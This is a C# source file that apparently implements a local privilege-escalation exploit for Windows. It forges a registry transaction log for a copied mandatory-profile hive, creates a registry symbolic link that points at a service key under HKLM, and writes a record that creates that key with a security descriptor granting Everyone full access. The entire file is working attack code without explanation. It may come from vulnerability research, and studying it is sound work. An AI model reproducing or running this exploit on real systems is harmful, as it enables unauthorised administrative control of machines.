﻿using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Log;
using System.Text;

namespace TransactionLog
{
    class Program
    {
        public static IList<ArraySegment<byte>> CreateRecord(bool start, Guid transaction)
        {
            MemoryStream stm = new MemoryStream();
            BinaryWriter writer = new BinaryWriter(stm);
            writer.Write(0);
            writer.Write(start ? 4 : 0);
            writer.Write(start ? 0 : 1);
            writer.Write(transaction.ToByteArray());

            ArraySegment<byte>[] segments = new ArraySegment<byte>[1];
            segments[0] = new ArraySegment<byte>(stm.ToArray());

            return Array.AsReadOnly(segments);
        }

        public static IList<ArraySegment<byte>> CreateDoCreateRecord(Guid transaction, string key_name)
        {
            MemoryStream stm = new MemoryStream();
            BinaryWriter writer = new BinaryWriter(stm);
            writer.Write(0);
            writer.Write(0);
            writer.Write(1);
            writer.Write(transaction.ToByteArray());

            byte[] str = Encoding.Unicode.GetBytes(key_name);
            writer.Write((ushort)str.Length); // Length
            writer.Write((ushort)str.Length); // MaxLength
            writer.Write(0); // Padding
            writer.Write(0L); // String pointer placeholder.
            writer.Write(0); // CreateFlags
            writer.Write(0); // Padding2
            writer.Write(0L); // SD Pointer place holder.
            writer.Write(str);
            writer.Write(new SecurityDescriptor("O:WDG:WDD:(A;;GA;;;WD)").ToByteArray());
            ArraySegment<byte>[] segments = new ArraySegment<byte>[1];
            segments[0] = new ArraySegment<byte>(stm.ToArray());

            return Array.AsReadOnly(segments);
        }

        static void CopyHives()
        {
            string target_path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
            DirectoryInfo dir = new DirectoryInfo(Path.GetDirectoryName(typeof(Program).Assembly.Location));
            foreach (var file in dir.GetFiles("*.man*"))
            {
                Console.WriteLine("Copying {0} {1}", file.FullName, Path.Combine(target_path, file.Name));
                File.Copy(file.FullName, Path.Combine(target_path, file.Name), true);
            }
        }

        const string TARGET_KEY = @"\Registry\Machine\System\CurrentControlSet\Services\ABC";
        const string SYMLINK_PATH = @"\Registry\Machine\Software\Microsoft\DRM\DEMO";

        static void Main(string[] args)
        {
            try
            {
                CopyHives();

                string base_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile), "ntuser.man");

                byte[] hive = File.ReadAllBytes(base_path);
                byte[] logid = new byte[16];
                Buffer.BlockCopy(hive, 0x80, logid, 0, 16);
                Guid id = new Guid(logid);

                string txr_path = base_path + $"{new Guid(logid):B}.TxR";

                using (LogStore log = new LogStore($@"log:{txr_path}", FileMode.OpenOrCreate, FileAccess.ReadWrite))
                {
                    Console.WriteLine(BitConverter.ToString(log.BaseSequenceNumber.GetBytes()));
                    Console.WriteLine(BitConverter.ToString(log.LastSequenceNumber.GetBytes()));
                    using (var records = new LogRecordSequence(log))
                    {
                        if (log.Extents.Count == 0)
                        {
                            log.Extents.Add($"{Path.GetFullPath(txr_path)}.0.regtrans-ms", 10000);
                        }

                        SequenceNumber previous = SequenceNumber.Invalid;

                        Guid tx = Guid.NewGuid();

                        previous = records.Append(CreateRecord(true, tx), SequenceNumber.Invalid, SequenceNumber.Invalid, RecordAppendOptions.ForceFlush);
                        using (var key = NtKey.CreateSymbolicLink(SYMLINK_PATH, null, TARGET_KEY))
                        {
                            Console.WriteLine("Created symlink {0}", key.FullPath);
                        }

                        previous = records.Append(CreateDoCreateRecord(tx, SYMLINK_PATH),
                            SequenceNumber.Invalid, SequenceNumber.Invalid, RecordAppendOptions.ForceFlush);
                    }
                }

                hive[0x90] = 1;
                File.WriteAllBytes(base_path, hive);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
